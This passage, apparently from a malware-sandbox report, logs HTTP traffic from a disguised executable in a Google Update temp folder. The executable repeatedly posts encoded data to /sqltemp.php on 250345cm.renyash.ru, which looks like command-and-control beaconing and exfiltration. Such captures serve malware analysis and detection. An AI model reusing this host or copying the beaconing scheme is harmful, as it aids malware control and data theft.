                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  72 | 192.168.2.6 | 62708 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:07.647829056 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  73 | 192.168.2.6 | 62709 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:07.960408926 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:08.427053928 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:08.608072042 CET | 955 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:08 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BnIuqMcauHvEy42Br26MG1LOYwFYxMMGpeltxwmqchtS%2FDldommSZuxUfZEd0w1Qp3Z8c%2BtPUmbATldhvnycDCD3bsraoMEqGDdS0FfUS%2FPsIPcN%2B05KifuJcDk7Pjlqi7gozRuQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364f55f6841ac-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4974&min_rtt=1773&rtt_var=7068&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2266&delivery_rate=53309&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  74 | 192.168.2.6 | 62710 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:08.085648060 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:08.537785053 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:08.802113056 CET | 814 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:08 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jl2937dxx24%2FC3Wjk8bqcVIzGFGMFaOxfRHhMgLpjvw9bHK1aV%2F1MLWt3NBcXHeNbWK%2B%2BDQZg6xmykkaM%2BUPgezeV%2FS7Gc3lMNi3C4vvsAanv9KpMTo3z%2Fqspugnd7a9VkpLirHo"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364f61b2cc336-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=11981&min_rtt=6291&rtt_var=13740&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=28176&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  75 | 192.168.2.6 | 62711 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:08.941576004 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:03:09.393985033 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:09.599112034 CET | 813 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:09 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ILfkweiiuQtB4PbpxJIpaovcx2oplJ%2BJyWpmDU03r%2FFqusOtGniP%2BLhUSjaoIMy%2FMkncF5BGgEwFn8VqTqkx4Vny9n%2FjOhL5Fc9gqDHaflKyfx%2B%2B7ESs2uwIItatjUFPVTtcXQyZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364fb6aa84373-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=6580&min_rtt=1646&rtt_var=10485&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=35506&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  76 | 192.168.2.6 | 62712 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:09.724282980 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1120
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:10.163470030 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:10.347675085 CET | 813 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:10 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P90SiuH51xrS2dCqdnmeH9SsMHbK6RO9%2BCA8kdYjC0%2FEBULc6yp%2BZvlrxIozn8jc6yL7LK2QBTd5KYMwQQSuFNcpL%2FIVkSi%2B1%2FoBnU2hMAFpgVVYo9I3IQTEqv%2BT9BPdlrWMuVO3"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36500398cc3f8-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2367&min_rtt=1498&rtt_var=2300&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1422&delivery_rate=172740&cwnd=159&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  77 | 192.168.2.6 | 62713 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:10.474524975 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:10.919001102 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:11.100461960 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:11 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=btWqKQ7iG5BPC%2BdvtxAXAbVZFmZE3Dj8jXcX6qaNbF66wJjvPh51qJyXZbrvTnNfUKw7nWTS4P97tLuDADCLaC3A6Ak%2BJnrmkDvhHwXLudHTvED2zYljCjE9h4PV9wrmyTjLL3tZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36504faaf43b0-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2780&min_rtt=1883&rtt_var=2501&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=161076&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  78 | 192.168.2.6 | 62714 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:11.235477924 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:11.687906027 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:11.952198982 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:11 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0LfKbPG4T5AvmP7h5bVi34iWMC8wCubuxRe0Ps4Ag59p1Uh6%2Bg%2FOaCaeD2WQBEJQKEKQ90XDZN4p5zxn2WLcBiY6cyGHbIgk9O%2B8HGNKg1x7DuenvNjRc2fz0rSrPCa%2BxiI9xuOb"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36509cec8c3fa-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1481&rtt_var=731&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=668804&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  79 | 192.168.2.6 | 62715 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:12.080233097 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:12.438463926 CET | 1124 | OUT | Data Raw: 56 51 5a 50 54 5c 54 56 58 56 52 59 56 50 59 54 5b 53 54 50 55 59 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VQZPT\TVXVRYVPYT[STPUYP^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-3-X4-Y%.;9=R4/<<)/7<$?:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:12.542864084 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:12.718910933 CET | 800 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:12 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ikhhOzacAb7OZqwRWGy%2FsWeejtdu5n6zL5ClgdZFO%2FqTLlF9JZUK4MAeeEPmRH7UGxUXvMZyzXocVgc0lyOq%2FyjHODQXaTqid7a7hTjCPGcYoHmgfLDtXb93eVA7xfiiQMFbDzd"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3650f1a54de95-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=7587&min_rtt=1463&rtt_var=12797&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=28935&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a
                                                                                                                  Data Ascii: 42W\X
                                                                                                                  Jan 1, 2025 16:03:12.799307108 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  80 | 192.168.2.6 | 62716 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:12.935436010 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:13.284388065 CET | 1124 | OUT | Data Raw: 53 54 5f 53 54 5a 51 51 58 56 52 59 56 5c 59 5e 5b 5f 54 59 55 54 50 54 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: ST_STZQQXVRYV\Y^[_TYUTPTZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-09[ '='B;*!R7<<7*$#" (+)%'W.&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:03:13.379698992 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  81 | 192.168.2.6 | 62717 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:13.623900890 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:13.969852924 CET | 1964 | OUT | Data Raw: 53 50 5a 51 54 5b 54 5c 58 56 52 59 56 5a 59 55 5b 58 54 5a 55 5a 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SPZQT[T\XVRYVZYU[XTZUZPZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-3/%\ <2'.3C/1U -;(:$*4 (?+A$<(::&Y.,Y--
                                                                                                                  Jan 1, 2025 16:03:14.067747116 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:14.337053061 CET | 956 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:14 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6RypVyT5Tc%2Bilk0T5sAbi2Ek1Ei%2FvjN0rwaeDLZYI5LQkKcu6gYwIv9r7wifkArwXhW95K%2FmNeMT9MetH1zHM8TjsWuVr611xf4kg8mht2DCo6NINwmZBrcCw9A6%2BenXJdQPl4ZG"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36518a8b30f49-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8040&min_rtt=1662&rtt_var=13380&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2266&delivery_rate=27708&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 25 50 29 5b 21 09 26 0c 20 1e 2a 3e 27 53 27 2e 0c 10 28 5e 32 5f 30 00 0d 10 29 5f 2f 58 22 12 2d 5f 31 28 0e 58 20 3e 38 02 30 34 2b 59 05 1c 20 43 36 06 3c 59 3d 04 2f 5d 32 3f 26 00 27 07 24 5c 3c 38 37 0a 23 02 3f 1d 33 3d 37 02 29 2a 30 54 27 2f 3c 03 2e 01 3e 0e 33 00 2c 54 00 11 26 57 24 1f 19 00 37 09 3c 59 22 21 22 01 25 42 2d 0a 32 12 27 50 23 39 21 07 31 1c 09 59 21 23 08 5a 26 05 0b 11 34 3d 23 19 2a 2e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%P)[!& *>'S'.(^2_0)_/X"-_1(X >804+Y C6<Y=/]2?&'$\<87#?3=7)*0T'/<.>3,T&W$7<Y"!"%B-2'P#9!1Y!#Z&4=#*.%S -H?WS0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  82 | 192.168.2.6 | 62718 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:13.768203974 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:14.126076937 CET | 1124 | OUT | Data Raw: 56 5f 5a 57 54 5f 51 56 58 56 52 59 56 58 59 53 5b 5e 54 5b 55 59 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: V_ZWT_QVXVRYVXYS[^T[UYPYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.X'?%"/)$X(;*=#?((>=?#$(=E28:&Y.,Y-%
                                                                                                                  Jan 1, 2025 16:03:14.213042021 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:14.480444908 CET | 811 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:14 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sfGELreOEoHwf6YF1KF2mLrbMF4Li%2FpjxF8amBQqT%2FGZXgDEj8XuNDahZ1Jrp82CrZ124b6GFxS1eCJ9xWuLnNB%2BVzwR%2FZzZs9bqOERtU%2F84llT%2FfvE6kb54vqMHi3qaIJkTELUn"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365198c6a8cc8-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2628&min_rtt=1994&rtt_var=2016&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=206594&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  83 | 192.168.2.6 | 62719 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:14.614149094 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:03:14.982657909 CET | 1124 | OUT | Data Raw: 53 50 5f 5c 51 5d 54 53 58 56 52 59 56 51 59 55 5b 5d 54 5c 55 5e 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
